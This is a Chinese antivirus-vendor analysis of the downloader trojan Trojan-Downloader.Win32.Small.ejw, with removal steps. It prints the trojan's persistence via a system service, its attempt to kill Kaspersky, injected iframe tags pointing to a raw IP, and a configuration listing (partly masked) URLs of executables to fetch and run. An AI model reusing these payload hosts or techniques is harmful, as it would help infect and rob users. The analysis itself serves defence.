Trojan-Downloader.Win32.Small.ejw - 王朝网络宽屏版

病毒名称： Trojan-Downloader.Win32.Small.ejw

病毒类型：木马

文件 MD5： 216221B8289779DAAB7405089391684F

公开范围：完全公开

危害等级： 4

文件长度： 19,788 字节

感染系统： windows98以上版本

开发工具： Microsoft Visual C++ 6.0

加壳类型： Xtreme-Protector v1.05

病毒描述：

该病毒属木马类，病毒伪装微软版本信息，用以迷惑用户。病毒运行后衍生病毒文件到系统目录下，连接网络下载病毒文件，修改注册表，创建服务，并以服务的方式达到随机启动的目的，删除系统正常服务。尝试结束卡巴斯基进程。

行为分析：

1 、衍生病毒文件到系统目录下：

%system32%d26bf5b8.dll

%system32%d26bf5b8.exe

%system32%d26bf5b8t.exe

2 、修改注册表：

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesD26BF5B8ImagePath

值 : 字符串: "C:WINDOWSsystem32D26BF5B8.EXE -service"

3 、开启服务：

服务名称： D26BF5B8

显示名称： D26BF5B8

描述： D26BF5B8

可执行文件的路径： C:WINDOWSsystem32D26BF5B8.EXE

启动方式：自动

4 、关闭系统正常服务 ERSVC：

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesERSvc

键值 : 字串: "Description"="服务和应用程序在非标准环境下运行时允许错误报告"

5 、连接网络：

src="http://count6.51yes.com/click.aspx?id=63610940&logo=1"></script>

src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>

src="http://59.34.197.164:81/80444/ad2715fg.asp"></iframe>

src="http://59.34.197.164:81/88888/ad56d.asp"></iframe>

/iframe>

src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>

frameborder='0'></iframe>

6 、该木马有盗取用户敏感信息的功能，连接网络，下载病毒文件到本机运行：

[update]

ver=0

url=http://127.0.0.1/

timer=1

[startpage]

startpage=0

url=http://www.sina.com.cn1

[favorites]

favorites=0

count=0

[desktop]

desktop=0

count=0

[popwin]

popwin=0

count=0

[addrpop]

addrpop=0

[alexa]

alexa=1

fileurl=http://www.al*x*.com/1.exe

url1=http://nba.9*6*k.com/2.htm

url2=http://5*.3*.1*7.1*4:81/808080/ad2881.asp

rl3=http://5*.3*.1*7.1*4:81/80444/ad2715fg.asp

url4=http://5*.3*.1*7.1*4:81/8046338888/ad285367.asp

url5=http://5*.3*.1*7.1*4:81/8046555/ad2878.asp

url6=http://5*.3*.1*7.1*4:81/80444/ad2715.asp

url7=http://www.u**s*e.com/top.html

url8=http://www.it*o*ns.com

url9=http://www.j*d*.cn

url10=http://www.*x*f.gov.cn

url11=http://www.g*ns*st*el.com

url12=http://5*.3*.1*7.1*4:81/88888/ad56d.asp

url13=http://www.y*h*l*ng.com

url14=http://5*.3*.1*7.1*4:81/8046222/ad2714.asp

url15=http://5*.3*.1*7.1*4:81/80465551/ad28781.asp

count=15

[im]

im=0

msg= 你好啊，兄弟！ http://www.s*n*.com.cn

qq=0

popo=0

uc=0

taobao=0

[file]

file=1

file1=http://www.t*o1*81*8.com/mh.exe

filename1=sthu1.exe

file2=http://h&inf*lm.cn/obug.exe

filename2=sthu2.exe

file3=http://www.t*o1*81*8.com/qq.exe

filename3=sthu3.exe

file4=http://imgbbs.sh*ngd*.com/bbs.shangdu.com/3/227/464355/file/gz.exe

filename4=sthu4.exe

file5=http://www.t*o1*81*8.com/12.exe

filename5=sthu5.exe

file6=http://www.y*-m*ng.com/bbs/geawe/fsgd/treter/1.exe

filename6=sthu6.exe

file7=http://www.t*o1*81*8.com/yk.exe

filename7=sthu7.exe

file8=http://jd.54l*um*ng.com/lm/one.exe

filename8=sthu8.exe

count=8

[count]

count=1

mecount=1

url=http://nba.9*6*k.com/lm/count/count.asp

7 、该病毒尝试关闭卡巴斯基进程。

注： % System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。

--------------------------------------------------------------------------------

清除方案：

1 、使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 使用安天木马防线 “进程管理”关闭病毒进程

终止所有IE进程

(2) 删除病毒文件

%system32%d26bf5b8.dll

%system32%d26bf5b8.exe

%system32%d26bf5b8t.exe

(3) 恢复病毒修改的注册表项目，删除病毒添加的注册表项

终止服务： D26BF5B8